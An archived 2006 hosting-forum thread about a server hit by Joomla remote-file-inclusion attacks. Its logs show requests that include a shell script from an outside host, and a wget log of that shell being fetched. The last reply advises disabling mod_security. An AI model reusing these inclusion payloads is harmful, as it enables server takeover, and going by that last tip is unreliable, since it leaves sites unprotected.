The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Attacked - Perl processes/Mod_security - Help!

Discussion in 'Security' started by jeroman8, Sep 22, 2006.

  1. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    Hi!

    The past 2 days I have had many, many Perl processes running.
    When I can get in to the server load is between 100-150.
    So to be able to work I kill all perl processes.

    I thing it''s a php script being used to run a off site script.
    My mod_Security seems to block a lot of stuff regarding similar stuff so I wonder if it
    is possible that mod_Securtiy will fail if the server being attacked ?

    What is the libwww-perl/5.805" at the end of the log below ?
    It changes version number - like it's trying to find something....

    I found a script in /tmp today, was not there yesterday, but could not see it
    since my virus program stoped me from reading it.


    72.9.239.178 - - [22/Sep/2006:12:02:57 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
    81.17.45.171 - - [22/Sep/2006:12:03:02 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.69"
    193.198.217.3 - - [22/Sep/2006:12:03:24 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
    66.36.233.10 - - [22/Sep/2006:12:03:28 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
    62.199.234.50 - - [22/Sep/2006:12:03:29 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
    70.85.88.196 - - [22/Sep/2006:12:03:43 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
    66.148.74.139 - - [22/Sep/2006:12:04:02 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.79"
     
  2. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    Look!

    He managed to save the file to the server some how !!
    Where the fu... is this file now - can't find it in tmp or the folders on "site" account...

    [Fri Sep 22 12:20:44 2006] [error] SecServerSignature: the existing signature is too short. Please set ServerTokens to Full
    [Fri Sep 22 12:20:44 2006] [error] SecServerSignature: the existing signature is too short. Please set ServerTokens to Full

    [Fri Sep 22 12:20:51 2006] [error] [client 193.198.217.3] File does not exist: /home/site/public_html/403.shtml
    [Fri Sep 22 12:20:53 2006] [error] [client 193.198.217.3] mod_security: Access denied with code 403. Pattern match "(\\\\.\\\\./\\\\.\\\\.|/|(http|https|ftp)\\\\:/)" at ARG("mosConfig_absolute_path") [hostname "www.site.se"] [uri "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt?"]
    [Fri Sep 22 12:20:53 2006] [error] [client 193.198.217.3] File does not exist: /home/site/public_html/403.shtml
    --12:20:55-- http://www.mr-ylli.com/sh3llx.txt
    => `sh3llx.txt'
    Resolving www.mr-ylli.com... 38.113.1.146
    Connecting to www.mr-ylli.com|38.113.1.146|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 17,114 (17K) [text/plain]

    0K .......... ...... 100% 373.41 KB/s

    12:20:55 (373.41 KB/s) - `sh3llx.txt' saved [17114/17114]
     
    #2 jeroman8, Sep 22, 2006
    Last edited: Sep 22, 2006
  3. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
  4. randomuser

    randomuser Well-Known Member

    Joined:
    Jun 25, 2005
    Messages:
    147
    Likes Received:
    0
    Trophy Points:
    16
    /usr/sbin/lsof -p pid

    fail to catch an attack? absolutely. it only blocks what it knows to block.
    everything else will bypass modsec.

    fail to continue to function? no.

    this is the user-agent. look at some other logs to see different
    user-agents (such as MSIE, Firefox, and so on). libwwww-perl
    is generally a suspicious user-agent.

    only changes because of a different version, like MSIE 5.0, or MSIE 6.0

    don't use windows to view it then

    these are all 403s.

    http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.4.4

    updatedb && locate sh3llx.txt, or
    find /home -name sh3llx.txt
    (use the manpages)

    also, it may be in /tmp (or /var/tmp, or /dev/shm, depending on
    your permissions and partition setup)


    the pdf explains a DoS situation in BIND, but not arbitrary code execution,
    just a DoS.


    ps aux | grep perl
    /usr/sbin/lsof -p pid

    to see more info on the file.

    who is the user, nobody, or are you using phpsuexec
    and can see the actual user?

    if you see the file in /tmp, do: stat filename
    note the ctime/mtime, grep your domlogs for accesses
    during this time, and find the vulnerable web script that
    is being exploited. it could be anything, possibly something
    with this path:

    /administrator/components/com_comprofiler/plugin.class.php

    or something else.
     
  5. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    That's an ancient joomla hole, not a hole in named. Unless they're trying to run some kind of exploit through joomla to further exploit the server.

    Mod_security should easily stop these requests. Is it not for you? If not you need a new ruleset.
     
  6. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    Thanks randomuser, I will check all this out.

    Mod_sec is installed and blocking 99% of all attacks.
    Obviously not all of them - I use 98% of hostmerits rules.
     
  7. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    What ones isn't it blocking? I can write some rules for ya
     
  8. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    This seem to block all of this:
    SecFilterSelective HTTP_USER_AGENT "libwww-perl"

    Hopefully there is now valid user agents named libwww-perl !?
     
  9. hostww

    hostww Guest

    It does block something that might be useful to customers...

    Requesting IP Date Time Handler GET Host Mod_Security-Message Mod_Security-Action
    65.61.156.43 2006-10-09 23:00:57 / HTTP/1.0 www.domain.com Access denied with code 403. Pattern match "libwww-perl" at HEADER("USER-AGENT") 403

    [11:42pm] [N] Resolved server3.web-stat.com -> 65.61.156.43
     
  10. student

    student Active Member

    Joined:
    Aug 9, 2006
    Messages:
    38
    Likes Received:
    0
    Trophy Points:
    6
    After applying this to mod_security, entries such:
    "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"

    are still appearing in httpd log, is it normal? In mod_securiyty log i see that this connection is blocked, but if so, then how it is logged by apache? Shouldn't is be blocked first, even before apache can log this?

    Ok, but speaking about mod_security rules, is it possible to filter all data link layer of all packets that are going through httpd? Im wondering how to block every packet that contains "#!/" string. Can mod_security do this?
     
  11. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    Yes, it still logs the entry even if it is blocked.
    They have access to the URL but instead of being delivered a 200ok and get the page they get the action 403 forbidden and do not get the page requested.

    You can probably anything you like.

    If you have not already - check out the host merit rules.
    Do a search here for "host merit" "mod_security"
     
  12. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    You may set certain rules to nolog,allow if you want to not log them and bypass that rule.
     
  13. randomuser

    randomuser Well-Known Member

    Joined:
    Jun 25, 2005
    Messages:
    147
    Likes Received:
    0
    Trophy Points:
    16
    The default log is a 406, not a 403, and logs to /usr/local/apache/logs/audit_log vice the domlog (edit: my apologies - it does in fact log to both places). From /usr/local/apache/conf/modsec.conf:

    If you added the user agent rule to modsec.conf, it may have been overwritten by cPanel. All rules should be placed in modsec.user.conf at all times.

    If you placed the rule in either modsec.conf or modsec.user.conf, you need to restart httpd for the new rule to work.
     
    #13 randomuser, Oct 13, 2006
    Last edited: Oct 14, 2006
  14. meweb

    meweb Well-Known Member

    Joined:
    Feb 10, 2003
    Messages:
    58
    Likes Received:
    0
    Trophy Points:
    0
    Just make sure to add the following line in .htaccess file under your public_html Dir and restart the apache and see the result.

    ##################
    SecFilterEngine Off
    SecFilterScanPOST Off
    ##################
     
Loading...

Share This Page